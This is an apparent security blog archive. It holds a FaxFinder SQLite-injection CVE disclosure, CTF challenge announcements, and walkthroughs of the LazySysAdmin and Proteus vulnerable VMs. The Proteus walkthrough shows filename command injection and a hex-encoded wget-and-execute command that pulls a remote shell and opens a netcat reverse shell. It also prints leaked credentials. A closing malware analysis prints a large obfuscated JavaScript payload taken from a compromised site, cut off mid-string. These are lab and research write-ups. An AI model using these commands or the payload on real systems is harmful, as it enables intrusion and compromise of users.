CVE-2018-17562 – FaxFinder 5.0.5.8 < SQLite Injection Vulnerability

Hi everyone,

Today, I am going to be writing a PoC for a new CVE I found for versions of FaxFinder 5.0.5.8 and older that can be exploited with SQLite Injection. I have reported this flaw to the vendor and they have fixed this issue with the new release of FaxFinder version 5.1.6. This post is going to be used as the official source used to accredit CVE-2018-17562. I will also include the conversation thread I had with MultiTech when reporting this flaw.

CVE Founder: Max Segura
Vendor: Multitech
Software: FaxFinder
Version: 5.0.5.8 and older
Vulnerability: SQLite Injection
Reported: 11-22-17
Fixed: 9-25-18

Intro

This vulnerability allows a remote or unauthenticated attacker to exploit an existing SQLite Injection vulnerability that lies under versions FaxFinder 5.0.5.8 and older. In order for this injection to work, a valid OID is needed for the injection. Upon exploitation, the attacker will gain access to the underlying database schema. The information on this post is intended to promote security awareness. Do not use this information to intentionally abuse a private computer system. You are responsible for your own actions; hacking is unlawful!

Proof of Concept

This section will contain step-by-step instructions on how to exploit this flaw. First, to prove that this flaw can be exploited by an unauthenticated user, let’s take a look at FaxFinder login page in either In-private Browsing or Incognito Mode.

Once the affected version has been identified, the next step would be to obtain a valid OID number from the fax server so we have an injection point. For example, take a look at the URL below:

https://site.com/status/call_details?oid=28807

The above image demonstrates that any user can enumerate the fax server for valid information. This can be done with ease through automated scripting. Now that we have a starting point, we can expose the flaw by tampering with the syntax used by the software. Inserting an ‘ (apostrophe) usually breaks the code’s syntax.

This is indicative of that the application can be exploited. The attack vector has been concealed to prevent unauthorized exploitation. If you need the attack vector to test your own systems, I may be able to disclose it privately.

The following information was extracted:

CREATE TABLE call_entry( oid INTEGER PRIMARY KEY, timestamp TEXT DEFAULT CURRENT_TIMESTAMP, rcpt_fax TEXT NOT NULL, direction TEXT NOT NULL, entrykey TEXT, remote_id TEXT NOT NULL, status TEXT NOT NULL, modem_nr INTEGER, size INTEGER, pages INTEGER, resolution TEXT NOT NULL, baud_rate TEXT NOT NULL, width TEXT NOT NULL, height TEXT NOT NULL, data_compression TEXT NOT NULL, error_correction TEXT NOT NULL, init_time TEXT NOT NULL, off_hook_time TEXT NOT NULL, connect_time TEXT NOT NULL, elapsed_time INTEGER, scan_line_time INTEGER, modem_trace_log TEXT, all_dtmf_digits TEXT NOT NULL )

This vector can be modified to inject other versions of FaxFinder up to the penultimate release of 5.0.5.8. Please upgrade to version 5.1.6 to patch this flaw.

Reporting Time Table

Here you can find my dialog with MultiTech to fix this vulnerability. This flaw was recognized in version 5.0.5.8 and the zero day was patched on 9-25-18.

As always, thanks for reading!

Advertisements

The Ether – A New Boot 2 Root Hacking Challenge

Introduction

Lately, I’ve been enjoying creating hacking challenges for the security community. This new challenge encapsulates a company, entitled – The Ether, who has proclaimed an elixir that considerably alters human welfare. The CDC has become suspicious of this group due to the nature of the product they are developing.

The Goal

The goal is to find out what The Ether is up to. You will be required to break into their server, root the machine, and retrieve the flag. The flag will contain more information about The Ether’s ominous operations regarding this medicine.

Any Hints?

This challenge is not for beginners. There is a relevant file on this machine that plays an important role in the challenge, do not waste your time trying to de-obfuscate the file, I say this to keep you on track. This challenge is designed test you on multiple areas and it’s not for the feint of heart!

Last Words

Whatever you do, do not give up! Exhaust all of your options! Looking forward to have OSCPs take this challenge. As always, good luck, have fun, God bless, and may the s0urce be with you.

http://www.mediafire.com/file/502nbnbkarsoisb/theEther.zip

f1re_w1re

LazySysAdmin Hacking Challenge

Introduction

Welcome back, everyone. On this new thread I will be posting my solution to the LazySysAdmin hacking challenge found in Vulnhub and my overall thoughts about it. I have to be honest, I struggled with completing this challenge primarily because I spend countless of hours looking for web applications flaws and inspecting every single avenue of exploitation. In hindsight, the challenge could have been completed in a matter of minutes, but of course the reality of arriving to such solution takes…hours.

The description of the challenge follows – The story of a lonely and lazy sysadmin who cries himself to sleep. According to the author, enumeration was key to solve this puzzle.

Tools used:
– Hydra
– SMBClient
– Dirbuster (or alike tools)
– Python, for automating tasks on the fly (more on this later).

Target Enumeration

There were a couple of open ports upon scanning the target, your standard HTTP port, SMB port, and SSH port. At first, the service on port 80 looked promising! I was wrong, big time. I spend a couple of hours a day looking at directory listings, analyzing WordPress install files, and PHPInfo(), however, this was a huge diversion. After giving up, I took another approach and was curious what the SMB daemon offered.

smbclient -L 192.168.0.14

I saw a couple of shares, 2 of which could not be used to leverage a vulnerability. I was able to connect to the share$ share and list the files on the document root.

smbclient '\\192.168.0.14\share$'

The deets.txt file grabbed my attention so I decided to download it and find its contents:

CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345

Brute Forcing Fun and Flag

I knew that 12345 was the password to something, but I was not sure what. Based on my research on the WordPress site previously, possible users were Admin, togie, or root. In context with the challenge (a lazy admin), I was positive that root login was enabled on the SSH daemon. The first thing I tried, despite having a possible password, was to brute force the root SSH account. I was shocked to find the following:

hydra -l  root -P cracker/rockyou.txt 192.168.0.14 ssh

The root password was indeed 12345. I was able to sign in via SSH and retrieve the flag.

After I completing this challenge, I had questions and I was wondering how secure the WordPress site was, after all it was running the latest version. After doing some recon on the file system, I placed the Admin’s password in one of my word lists to see if local brute force protection was enabled.

After 50 password attempts, I was able to brute force the admin page through XMLRPC. This password grants you access to the WP dashboard and MySQL database. What I found aligns with the context of a lazy system admin.

Conclusion

What did I learn? Well at first, I got lost in the sea of files and checking to see which ones were world-readable. I got very frustrated and I knew my last ditch was a brute force attempt – little did I know that was the fastest way to solve this challenge. A SSH brute force attack would have gotten you root access and the solution to this challenge. Once everything was figured out, everything looked simple, but I cannot hide the fact that this took me a couple of days to riddle! What was your solution?

Until next time,
May the s0urce be with you.

New H.A.S.T.E Hacking Challenge

Hi, from the other side of the wire!

On this post, I want to highlight a new VM that I made to accentuate web application vulnerabilities. This vulnerable-by-design box depicts a hacking company known as H.A.S.T.E, or Hackers Attack Specific Targets Expeditiously, capable of bringing down any domains on their hit list.

I would like to classify this challenge with medium difficulty, requiring some trial and error before a successful takeover can be attained. You don’t have to root this machine to complete the challenge! All you have to do is get some sort of shell on it.

The H.A.S.T.E VM can be downloaded with the link below:
http://www.mediafire.com/file/115hejg5umvbnpq/HASTEVM.zip

You will need VMWare Player to virtualize the VMX.

If you enjoy web application flaws, you should have fun with this challenge. Let me know how it goes and feedback is always welcomed! Looking forward to solutions.

f1re_w1re, out.

EDIT: I’ve been very pleased with the amount of people attempting to solve this challenge. By far I’ve had 3 successfull researchers. The first was MrMxyzptlk, then Dweezy, and finally Amonsec with the fantatic walkthrough. I will be developing other VM’s that are a bit more complex to challege the security community. Thank you all for playing!

The Proteus Challenge

Introduction

Hi, yet again, World Wide Web. Lately, I’ve been looking for boot to root challenges that haven’t been documented online. Recently, I found one on Vulnhub entitled “Proteus” that did not have any walkthroughs. So with that statement, I present you with the solution to the Proteus challenge. This thread will touch upon the following concepts:

  • Basic Linux Commands
  • Basic Linux System Files
  • HEX and ASCII Conversions

The pseudo scenario of this challenge pertains to an IT company that is implementing a malware analysis tool that scans potentially malicious files. It uses the strings and objdump commands to find more information about a file. The target IP is 192.168.0.14 and the attacking machine 192.168.0.16.

System Discovery

When I first discovered the Proteus’ IP address, the TCP scan I fired did not reveal anything too sensitive, showing only Apache and SSH broadcasting. Before I dove my web browser to the web page, I probed the SSH service only to find out that password based-authentication was not being used. This meant that brute forcing this service was out of the question due to the use of public key authentication by the Proteus box.

When I visited the web page, I was presented with the following depiction of the site.

I decided to investigate the malware analysis tool by this fictional company. One thing that caught my attention was the need to upload certain file types. The allowed MIME types were: application/x-executable, application/x-sharedlib. I decided to play along and see what happens. I made a really quick C program to upload.

#include 
int main()
{
printf("exec test");
};

The proceeding screen outputted the results for strings and objdump after I uploaded the file.

When I first saw this, my initial thought of exploitation was to either exploit the output of strings or objdump, or there was some sort of buffer overflow I had to abuse. Although a buffer overflow seems possible (based on the extensive testing done), I am not adept in binary exploitation, however, I did manage to get RCE.

Let’s face it, black-box-testing is difficult and one always has to speculate on the backend code. Any user input should be considered malicious, and I knew that the file I was uploading can be tampered with. If we are lucky, we should be able to mess around the naming structure and see if the statement used to get the malware samples on the page can also by taking advantage of.

Remote Code Execution

RCE is one of the most complex flaws to exploit because they are difficult to spot. On this challenge, I was able to execute arbitrary code and shell this box in a very peculiar way.

Going back to the Proteus home page, I decided to upload another malware sample but this time, catch the request on BURP and modify it. The end request looked as such:

Content-Disposition: form-data; name="file"; filename="test.exe;ls -la"

I let the request fly and the following page looked promising.

I was pleased to see this and my mind quickly formulated the next steps to gain access. Before I proceeded with anything premeditated, I was curious to see what was under /tmp. So crafted the following request:

Content-Disposition: form-data; name="file"; filename="test.exe;ls -la /tmp"

To my amazement, there was no output on the sample page. This confused me. I spend most of my time trying to figure out how to write files to other places in the system. There were 2 big problems I encountered.

1. Document root, and child folders, were not writeable.
2. I could not list anything outside of the document root.

Having RCE is great, however, if it cannot be used to gain access, it does not serve us much purpose. After 20 minutes of testing and critical thinking, I could only come up with one answer: input sanitation.

Bypassing RCE Restrictions

I can only assume that my forward slashes (/) were being escaped, or dropped, or replaced. So I had to come up with another method of getting shell without my command having a “/” in the payload. This challenge made me think, but I did manage to figure it out through several Linux pipes. Below is the workflow I tried to follow to successfully carry the attack.

1. Getting the shell script, putting it in /tmp, and executing it.
This got done by using: wget http://192.168.0.17/shell.txt -O /tmp/shell.txt; php -f /tmp/shell.txt

2. Bypassing the “/” filter.
I encoded the above command in HEX then decoded it with xxd, like so: echo 7767657420687474703a2f2f3139322e3136382e302e31372f7368656c6c2e747874202d4f202f746d702f7368656c6c2e7478743b20706870202d66202f746d702f7368656c6c2e747874 | xxd -r -p

3. Executing the decoded string (putting it all together).
echo 7767657420687474703a2f2f3139322e3136382e302e31372f7368656c6c2e747874202d4f202f746d702f7368656c6c2e7478743b20706870202d66202f746d702f7368656c6c2e747874 | xxd -r -p | xargs -0 bash -c

Getting a Shell!

The end request appears as shown:

A local Netcat listener was set and shortly after saluted me with a shell access to the box:

After some digging, I found useful files and links. The first thing I learned was that the server’s document root was a symbolic link to the home directory of the malwareadm user. The group file revealed an interesting detail.

root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:syslog,malwareadm
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:malwareadm
floppy:x:25:
tape:x:26:
sudo:x:27:malwareadm
audio:x:29:
dip:x:30:malwareadm
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:malwareadm
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
systemd-journal:x:101:
systemd-timesync:x:102:
systemd-network:x:103:
systemd-resolve:x:104:
systemd-bus-proxy:x:105:
input:x:106:
crontab:x:107:
syslog:x:108:
messagebus:x:109:
netdev:x:110:
lxd:x:111:malwareadm
mlocate:x:112:
uuidd:x:113:
ssh:x:114:
malwareadm:x:1000:
lpadmin:x:115:malwareadm
sambashare:x:116:malwareadm
ssl-cert:x:117:
mysql:x:118:

The malwareadm user was part of some groups but most importantly part of the sudo group.

Capturing the Flag

After some recon, I found the following files that helped me through solving this challenge.

cat /home/malwareadm/sites/proteus_site/web/cfg/config.php

<?php

class Conf
{

    /* MySQL */
    const MYSQL_USERNAME    =   'root';
    const MYSQL_PASSWORD    =   'viWJ.cgdf&3a]d3xh;C/c]&c?';
    const MYSQL_HOST        =   '127.0.0.1';
    const MYSQL_DATABASE    =   'proteus_db';

    /* Application */
    const DEBUG                 =   false; 	                    //true/false
    const INSTALLED_DIRECTORY   =   '/';                        //something
    const MAIL_ALIAS		    =	'malwareadm@proteus.local';	//Something like user@internet.co.za
    const SECRET                =   'thisisthesecret';          //This is the secret to salt the hashes
    const FILE_PATH             =   '/home/malwareadm/samples/'; //This is the file path of where the execs will be saved
}

cat /home/malwareadm/sites/proteus_site/admin_login_request.js

// THIS IS JUST USED TO IMPERSONATE AN ADMIN FOR THE CHALLENGE

var username  = 'malwareadm';
var pwd = 'q-L%40X%21%7Bl_%278%7C%29o%3FQ%2BTapahQ%3C_';

var webPage = require('webpage');
var page = webPage.create();
var postBody = 'username=' + username + '&password=' + pwd;

page.open('http://127.0.0.1/samples', 'post', postBody, function (status) {
	if (status !== 'success') {
		console.log('Unable to post!');
	} else {
		console.log(JSON.stringify({
			cookies: phantom.cookies
		}));
	}
	phantom.exit();
});

These files revealed very crucial information to complete the challenge. These 2 files show the root password and also the malwareadm user password URL-encoded, decoded being “q-L@X!{l_’8|)o?Q+TapahQ<_”. It also shows the salt used for the password which can be used for cracking (not my cup of tea for this challenge). At this point, all we have to do is switch to the malwareadm user. I was having issues changing my shell from sh, so I used Python to get a bash shell to complete this transition.

The flag is actually a picture.

This completes the challenge, very humorously.

Conclusion

To end things, this is probably the easiest way to complete this box. I am convinced there are other methods to obtain the flag. I noticed one of the files that I had access to have the SETUID bit enabled, I am sure exploiting this binary is another way to get the flag. Additionally, we have database access. We can potentially escalate privileges through a malicious UDF. Brute forcing local accounts can also be another method of solving this machine. As far as I can see, there are different routes to complete this challenge. I am looking forward to explore and publish other ways to complete this when I have more time.

Nonetheless, I really enjoyed every bit of this challenge and I’m looking forward to other ones! I hope you enjoyed reading my ramblings.

Happy hacking!

Code in The Shadows

Introduction

Hello, everyone. Recently, I stumbled upon an interesting piece of malware as I happily ventured my browser through the internet. The obfuscated code I am going to reveal was found on a relatively large office supply website. I had fun reverse engineering this piece of code and I will do my best documenting it here. For the sake of the site and user’s privacy, the name of the affected domain will be excluded from this write-up.

Knowledge on the following areas will help you understand this post:

  • Base64
  • XOR
  • ASCII Characters

I want to honourably mention one of my colleagues, Dark C0d3r, who I’ve bounced back good ideas with in regards to my findings. You can read really cool l33t stuff on his blog at https://da3m0ns3c.blogspot.com/. He beat me to the write up, however, since I discovered this malware, it is only appropriate to document my thoughts as founder after all. Big props to him and his team, they really are an intelligent bunch. Without further ado, let begin!

Obfuscated Code

One casual day at work, I was tasked by my network engineer to investigate the cause of why one of the sites we purchase materials from was being blocked by our anti-virus. At first, I was not sure if our AV was producing a false-positive, however, visiting the site was no longer possible from a web browser due to the security policy in place.

Although our company predominantly uses Windows, I had access to a Linux machine. I proceeded in handing over the URL to the cURL binary and retrieved the possible culprit of this interesting journey that began that day. My eyes feasted on the obfuscated code below.

var PRZKZPVRCI = atob('dmFyIERSWVVRSUVESFMgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDEzLTMsMTI1LTcsMTAyLTUsMTE4LTQsMzktNywxMTMtNiwxMDctNiwxMjctNiwzOS03LDY2LTUsNDEtOSw0MS0yLDExMS00LDc1LTQsNzktNCwxMTEtNCwxMjQtMyw5NS02LDkxLTYsOTItMywxMjctNiw3OS05LDQ2LTcsNjQtNSwxMS0xLDEyMi00LDEwNi05LDEyMC02LDMzLTEsMTA4LTcsMTE2LTYsMTAxLTIsMTA2LTUsMTA3LTcsMzktNyw2NC0zLDM5LTcsNDItMyw4Ni00LDc1LTQsMTEzLTksNTMtMiw3OS04LDY4LTIsMTEyLTEsMTIzLTksODYtNiw3Ni05LDEwOC0xLDg3LTksMTEwLTksNzItMSw3Mi0zLDEyMi0yLDgxLTYsMTA3LTMsMTEzLTUsOTgtOCw4NS05LDEwNS0yLDEyMC05LDU3LTgsNzUtNSwxMTMtOCw5NC05LDg0LTksODAtMywxMzAtOSw4MC03LDc4LTksNzMtMyw1OS04LDExNi04LDExNi01LDkwLTUsNTEtMiwxMTEtMywxMTQtNSw4Ni0zLDU3LTcsMTA5LTksMTIzLTksODUtMiw1Ny04LDU4LTUsNTEtMSwxMDUtOCwxMTItNywxMTMtNiw5Ni03LDc0LTEsODktOCw1Ny01LDU0LTUsNzktMywxMzEtOSw4NC0yLDEwNy02LDEwOC03LDk2LTgsNTUtMiw1NS0yLDc5LTEsNzAtMywxMDctOCwxMDctNSw4My03LDU1LTUsOTItNyw5NS01LDc0LTMsNzItNCwxMDUtNiwxMjUtNSw4Mi00LDExMS03LDg1LTMsMTIyLTUsODYtNSwxMTgtOSwxMTItNSw1NS04LDY5LTMsNzMtNiwxMTctNiwxMjItNiw3NS0xLDEyOS03LDczLTgsOTEtMyw3OS02LDkwLTUsODctOSw1MC0yLDEwNi00LDkxLTYsNzktNSw5Ny05LDgzLTgsMTE0LTksNjctMiw1Ny0yLDczLTYsMTA4LTIsODAtNyw5Mi0yLDc4LTIsMTA5LTQsODctMiw4Mi01LDg3LTIsOTAtMyw2MS04LDYyLTYsOTUtNiwxMTYtNiw4NS03LDgwLTMsNzItNCw4OS01LDc1LTIsMTA5LTEsNzUtOCw2OS00LDUwLTIsMTIzLTQsODItMywxMTUtOSwxMDMtMyw5NC00LDgyLTQsODctNSw2MC00LDExNS02LDg0LTUsODMtMSw1OC0xLDg5LTcsMTA3LTgsNzUtMyw4Ni0xLDExMS02LDEwMy00LDU2LTgsMTI2LTYsODItNiw5OC04LDEyNC0yLDUzLTUsODItNyw3MC0zLDU2LTUsMTA4LTEsMTI5LTcsODItNywxMjgtOCw5NC01LDEyMC02LDg1LTIsNjAtOSwxMTQtMiwxMTctMyw3MC0yLDEyOC04LDk3LTgsNTYtMiw4MC03LDcwLTIsOTAtOSwxMDAtMSw3OS00LDY4LTIsNjYtOSwxMTgtNiw4NS02LDgzLTIsNTctNSwxMDgtNiw4NC00LDY5LTIsMTAxLTIsMTIwLTYsNzQtMiw3NC02LDg5LTcsODQtMyw5Mi04LDkxLTQsMTE3LTEsNzktMyw3My01LDEyOS03LDEwNC0xLDExNi02LDEwNC0zLDg0LTIsNzUtOSw2NC03LDk2LTcsODctMiw1Ny04LDEyMy05LDg0LTEsMTI3LTcsNjgtMyw1Mi01LDEwOS05LDkxLTMsNzAtMSwxMDEtNCw4MC00LDExMi05LDU2LTQsMTEwLTMsNzUtMiw2OS0yLDEwOS02LDkxLTQsODAtMiwxMDgtMiw1OC02LDEyNS02LDc0LTIsNzgtNyw2MS04LDc0LTcsMTAwLTIsMTEzLTQsMTIxLTYsODMtMiwxMDYtNyw1Ni01LDExNi04LDUzLTQsMTAzLTIsOTMtNywxMTAtMyw1Mi00LDcwLTIsMTE1LTksODUtOCw0Ny00LDc5LTgsODctNSwxMDUtNSwxMTAtNSw5NC02LDU2LTUsMTExLTMsOTItMiw4Ny04LDUzLTMsNzUtNSwxMTgtOCwxMDAtMywxMjgtOCw1Mi00LDkwLTEsODQtOSw1OS04LDg3LTIsMTIxLTYsNzMtMiw2OS0yLDcyLTMsODQtNSw3OC0zLDg1LTEsNjItNSw3Ny0xLDkxLTksNzYtNCwxMDgtMSw2MC01LDg0LTUsNjktNCw1Ny0xLDExOS0xLDc3LTksNzItNSw5Ny04LDUwLTMsNzAtNCw3MC01LDExNy0xLDU4LTcsNzktNiw3Ni05LDExNS00LDEwMC0xLDgzLTUsNzItNSwxMTUtNCwxMTItOSw4MC00LDEwNy00LDk0LTksNzktMSw5Ni03LDExMy01LDY0LTcsNTctNCw5MS00LDkyLTksNTktMyw4Ny05LDk4LTgsNTMtMyw4NS03LDgwLTUsNzMtNSw2OS0xLDEwNS0yLDEyNC0zLDg0LTQsNzItNiwxMDYtNywxMjQtMyw5MS04LDEyNS0zLDEyMi03LDU0LTMsODctNCwxMjQtNSwxMjQtNSw2MC04LDc4LTEsMTA4LTIsMTIwLTEsOTQtNiw4NC03LDExNS04LDkxLTYsMTIwLTYsODMtNywxMDctNCw5MC01LDEwNC0zLDc5LTMsOTAtNiw1MC0xLDU1LTIsODUtMyw3NC0yLDEyNC04LDgxLTUsMTAzLTMsNTItMiw3OS01LDc5LTMsNjctMiwxMTEtMyw4My01LDU1LTYsMTA5LTgsOTAtNCwxMTMtNSwxMTEtMiw3Ni01LDg4LTUsODAtNyw1NC03LDczLTEsMTA2LTMsMTE4LTMsNTgtNywxMDAtMiwxMTUtNyw4MC0yLDk4LTgsOTUtNSwxMTMtOSw5OS05LDgxLTMsMTAzLTYsNTItNCwxMTctMiw4NS04LDg0LTUsNzYtOCw3NC0xLDY1LTksNzItMiwxMjktNyw3NS0xLDgzLTcsMTA1LTQsMTE4LTksMTE5LTQsMTAyLTEsNzgtNyw2OS0xLDUzLTEsMTIxLTIsNzktMSwxMjAtMSw1MS0yLDExNS00LDc4LTYsMTI5LTgsMTEyLTksODEtOSw3MS01LDY4LTMsNTQtMiw1Ny0xLDgzLTksMTIyLTIsMTE3LTYsOTQtNSw4Ni04LDkwLTksNjEtOCwxMjMtNSw5NS02LDExNi04LDczLTcsMTI1LTMsMTEwLTksOTUtNyw4Ny0yLDEyNy04LDc3LTUsNTctNyw5NS01LDc3LTksNzgtMSwxMTItNywxMTUtNCw4Mi01LDgxLTksNzctOSwxMDAtMSwxMDktNSwxMDEtMSwxMjctNyw2Ny0yLDExOS04LDcwLTIsMTI0LTMsODAtNywxMzAtOCw3OS01LDY3LTEsNjQtNywxMjctNywxMDEtMiwxMTQtOCw1Ni00LDkwLTMsNzctMiw4Ni01LDEyNi03LDEyMC02LDc4LTIsMTEyLTUsMTI3LTcsODUtNCwxMDktOCw4OS0xLDkxLTksMTEwLTMsOTYtOSw5My02LDEyNS05LDEwNi05LDkyLTIsMTI0LTIsMTA4LTksOTAtMiw5Ni05LDg1LTIsMTI0LTUsNTQtNiw4Mi0yLDEwOS01LDEyNS02LDExNS00LDgxLTksNTQtNCwxMTItNSwxMDgtMyw2Ny0xLDg1LTMsNTEtMyw2MS01LDgxLTUsODYtNCw5MS0yLDEwNi00LDEwNS03LDEwOS0yLDEyNy04LDExNC02LDgzLTksNjctMSw2Mi01LDEwNS00LDEwNi03LDgxLTksODgtMiw2MS05LDg4LTYsNzctNiw5My0zLDc3LTYsMTA3LTcsMTE0LTcsNzgtOCw4NS05LDk0LTcsOTQtNiwxMTUtNyw1Mi0zLDEwOS04LDg3LTEsMTEzLTYsNjEtNyw3OC04LDU5LTksMTAwLTEsNDQtMSw3NS04LDExMi04LDU4LTYsNjEtNSw4My00LDEyNy02LDUxLTIsOTYtOCw4My03LDEyNi03LDk0LTksMTA3LTEsODItNiwxMDctMyw4NC03LDUzLTMsODgtOCw1My0yLDU1LTYsNDgtNSw3NS00LDEwOC0yLDg2LTUsNzgtMyw4MS00LDc2LTksMTA3LTcsODYtOSw4Ny0yLDc5LTcsMTE2LTgsNTItNCw5Ni02LDcxLTEsMTE0LTYsMTE1LTEsODgtMSwxMTItMyw1OC01LDEyMy05LDc4LTksNzYtNCw4Ny05LDg2LTIsMTAzLTMsOTEtMywxMDgtMSw3Mi0zLDk4LTgsMTEyLTksNTctNSwxMjAtNiw4My00LDY3LTIsNTYtMyw5NC00LDc3LTQsMTE3LTksNjItNSw1OS02LDk0LTcsOTEtNCw5Ni02LDgxLTUsNzgtMiwxMDctMiw1OC05LDc4LTIsODgtMyw5MS04LDU4LTYsNTktMyw4My01LDEyMy0zLDU2LTgsMTE0LTIsNzUtMyw3NS00LDExMy02LDExMC00LDY2LTEsMTA4LTUsMTEzLTIsMTE5LTMsODUtNiwxMTItNywxMjMtOCw3NC05LDkxLTEsMTE1LTgsNTEtMiwxMDgtNCwxMDYtOSwxMjItMiwxMjMtNCw4OS04LDg3LTksMTI2LTQsNzUtNiw1My0zLDcyLTQsMTE4LTksMTA3LTQsNjktMSw4My03LDEwNy0xLDEwNC0xLDEwNS0zLDczLTMsMTA2LTEsMTE5LTQsMTE4LTMsMTAxLTEsMTI4LTgsOTQtOSwxMTQtOCw2OC0yLDkyLTksNzMtOCw0OS0yLDcxLTYsNTctOCwxMTUtNywxMTUtNSwxMDItMiw5NS04LDEyMS01LDg5LTgsOTctNywxMDgtNCw2Ny0xLDgxLTMsOTktMiw1My01LDEyMy03LDk5LTksMTA1LTQsOTYtOCw5Mi02LDU1LTIsNzAtMiwxMTMtOCw1Ny0xLDcyLTIsNzgtNSwxMjktOCw5MC05LDEwMC0xLDkzLTcsMTI1LTMsODktNCw2MS03LDg0LTUsMTA4LTQsMTA5LTYsMTI0LTMsNzMtOCwxMTMtOCwxMDctNCwxMDktMSw5MS04LDU3LTksODktNyw1OS02LDc1LTIsMTEyLTksOTItMyw5MS01LDc3LTIsODMtMiwxMDgtNSwxMTItMyw4My0zLDEyMS0yLDc1LTIsOTMtNiw4My01LDUxLTEsNTQtMSw5MC02LDkzLTYsOTItNSw5My0zLDgwLTQsOTgtOCwxMjQtMiw5MS0xLDEwNi0yLDg5LTIsOTUtNywxMDktMiwxMTQtMyw4OC0zLDU0LTMsODAtMiwxMTEtMiw5MC03LDEyMi0xLDcyLTMsNDgtNSw3My03LDg3LTUsMTIwLTksMTI1LTksODctNyw3NS03LDkxLTIsOTYtOCw5My0zLDExMi05LDEyMy00LDExMi03LDg0LTQsMTMwLTksMTA1LTIsOTYtOSw3OS0xLDEwOS0zLDU0LTIsMTI4LTksNzQtMiw3Ni01LDU2LTQsODEtOCw3NC0zLDcxLTQsODktNCw4Mi03LDcxLTEsNzMtNSwxMjEtMSw2NS05LDEwNS00LDg0LTMsNzktNSw4Mi01LDkyLTksNTctNywxMDUtNSwxMjEtNyw4Ny00LDEyNy04LDYxLTUsNjEtOSw4MC02LDU1LTQsMTE1LTgsMTA0LTcsNzUtNCw4NS0zLDU2LTgsMTE2LTcsNzctMywxMjQtNCw2MC04LDEwMS0yLDEwMy0yLDkxLTQsMTA5LTUsNTYtMyw3NC0yLDg1LTIsMTA5LTIsODItOSw4My02LDExMy04LDkzLTQsODMtNCw3Ny03LDEyNy02LDU0LTUsNTktNCw4Mi0zLDEwNS0xLDk0LTUsMTE4LTYsNjYtMSw3MC0zLDU2LTQsMTI0LTcsOTMtOCw3My0xLDg2LTgsNTUtMiwxMDctNyw5MS0zLDExNy05LDkyLTIsODQtNyw2OC0zLDEyMC05LDU1LTYsMTA0LTcsMTI4LTksMTA5LTYsMTEzLTQsNzktNCwxMTAtNSw3NS02LDU2LTQsNzEtNCwxMjUtMyw3Ny0zLDgyLTYsMTAyLTEsMTEyLTMsMTE3LTIsNzctNCw4MS03LDExNC05LDYwLTQsNTEtMyw4MC0yLDg5LTgsMTIxLTIsMTExLTUsOTEtOSw4Ny00LDU2LTQsMTE2LTgsNzItNCwxMjgtOCwxMjMtNCwxMTAtNiw3My0yLDEwOC0yLDY0LTcsODMtMSw5Ny03LDcwLTEsMTE5LTMsMTEyLTQsOTktMiw1Mi00LDc1LTksOTEtMSw4MC0xLDEwOS02LDExNS00LDYwLTksNzktOCw2OS0yLDEyMi03LDg4LTksOTYtNiw1OS05LDc0LTgsODItNiw4OC0xLDUyLTIsODktNyw1OC03LDEwMy00LDcyLTMsNzctMyw4MS00LDg2LTMsNTItMiwxMDgtOCwxMjAtNiw4OS02LDEyNy03LDY4LTMsNTEtNCwxMDEtMSw5NS03LDcyLTMsMTAzLTYsNzItMSw4NC0yLDEwOC01LDEzMC04LDc2LTEsMTEwLTYsMTE0LTcsODctOSwxMDYtNSw5NS04LDEwOC00LDExMC0zLDk0LTcsOTQtNywxMTktMywxMDMtNiwxMDYtOCwxMTUtNiwxMjEtNiw4Ni01LDEwNy04LDU3LTYsMTE0LTYsNTQtNSwxMDMtMiw5MC00LDExMi00LDExMi0zLDg4LTUsMTI4LTcsODQtMyw5My04LDczLTIsNjctMiw1Ni04LDU4LTYsNzctMywxMjktOCw1Mi0zLDk3LTcsMTA0LTMsNTAtMiwxMjQtOSwxMTItNSw3Ni02LDcwLTQsNDktMSw5My00LDg1LTcsODctNCw3Mi03LDU5LTMsOTEtNSwxMjUtNCw2MC00LDc1LTUsNzctNCwxMjYtNSw2MS05LDkwLTYsODEtMywxMTItNiw2MS00LDYzLTYsODUtNiwxMTEtNiw5MS0yLDExOC03LDY5LTIsMTA2LTEsMTE5LTgsMTI0LTcsODYtMyw1My00LDgxLTcsNTQtMSwxMDgtOCw1OC04LDg3LTUsMTA0LTYsMTAwLTIsNTYtNyw3NC04LDg2LTgsMTAwLTMsNTctOSwxMTktMyw5OS05LDEwNy02LDkwLTcsMTEzLTksODktNSw4OS0yLDk2LTksOTgtOCw3OC0yLDk1LTUsMTIzLTIsODItOSw4NS03LDkxLTQsOTMtNSw3NS02LDUzLTMsNzItNiwxMDktNiwxMTctNiwxMjItMSw3NC03LDExMy03LDk0LTksNTEtNCw4Ni0zLDUzLTUsOTAtOCwxMTEtNCwxMDktOSw5My01LDg1LTMsNzktNiwxMDMtNSw1NC02LDExOS00LDU5LTMsODYtNSw5My04LDEyMC00LDkxLTEsMTAzLTIsOTQtNiw5MC00LDU0LTEsOTMtNiw4OC01LDkxLTYsNDktMSw4My02LDg1LTIsMTE4LTcsNzMtMSw3MC0yLDc3LTksMTI4LTgsNTEtMiw5My0zLDc1LTUsMTEyLTUsMTE5LTgsNzUtMywxMTEtNiwxMTgtMywxMTItMiw4Ny0yLDc3LTUsODYtOCw1Ni0zLDEwNC00LDk3LTksMTE3LTksOTYtNiw4Ni03LDU3LTcsNzMtMywxMTctNywxMDQtNyw1Mi00LDEyMS01LDkzLTMsODktOSw3NC02LDEwOC0xLDExNy00LDc2LTQsNzktOCw5My00LDgzLTIsODgtNCw5MS00LDEyMC00LDc5LTMsOTAtMyw4OS0xLDExNi04LDUxLTIsMTAzLTIsODMtMSwxMTUtNCw5OS05LDgwLTksNzQtNiw4NS04LDExOS02LDc0LTMsODItMSw1NC01LDYwLTcsMTAyLTUsNzYtNCwxMTAtMywxMDMtNiw3Ni01LDg0LTIsNTAtMiwxMTItMyw4MC02LDEyMi0yLDUzLTEsMTA4LTksMTAyLTIsMTI2LTQsMTI1LTYsNTYtNSw3OC02LDg1LTIsNzktMiw4OS01LDczLTYsNzYtOSw1My00LDc2LTg